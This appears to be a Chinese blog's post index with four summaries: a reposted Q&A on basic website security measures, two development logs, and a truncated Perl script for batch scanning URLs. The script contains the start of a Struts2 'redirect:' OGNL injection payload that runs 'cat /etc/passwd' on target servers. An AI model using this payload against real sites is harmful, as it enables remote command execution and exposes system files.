摘要:
今天逛的时候发现的,就此转下:1、一个网站基本的安全措施有哪些?答:1)服务器管理权,包括服务器是否容易被被盗,服务器是否能让人随意插拔网线,服务器网关是否可以由别人随意控制 2)shell权限管理,如何登录服务器管理,必须本地登录,或者可以远程登录,或者通过vpn或者防火墙控制登录。 3)数据库管理,只允许本地登录,也允许远程登录,是否有ip限制。 4)网站软件运行的用户是否是root,能否随意读取服务器上的文件 5)代码中是否有sql注入,xss攻击的可能 6)OS是否有漏洞或者后门 7)DNS是否安全 8)是否有arp攻击2、一个网站的用户数据库被入侵的方式有哪些? 1)代码中有s... 阅读全文
摘要:
1.将用户密码以MD5加密.2.修改密码处也改成MD5的.3.后台建立,开始写后台模块。4.完成后台个人信息查看、管理修改密码模块。5.完成后台用户列表查看模块。6.调整了后台主页面CSS和框架. 阅读全文
摘要:
1.更新了协助申请的代码,添加了上传图片功能.2.试验前面的功能,并做一些改动。3.Perl守护脚本添加了日志记录功能。 阅读全文
摘要:
手贱写了个批量测试的。。昨天要测几个东西。。#!/usr/bin/perluse HTTP::Request;use LWP::UserAgent;use threads;use Thread::Semaphore;use Socket;while(){ Webscan($_);}sub Webscan{ local($scan_url)=shift; $tmp=$scan_url .'?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/pa 阅读全文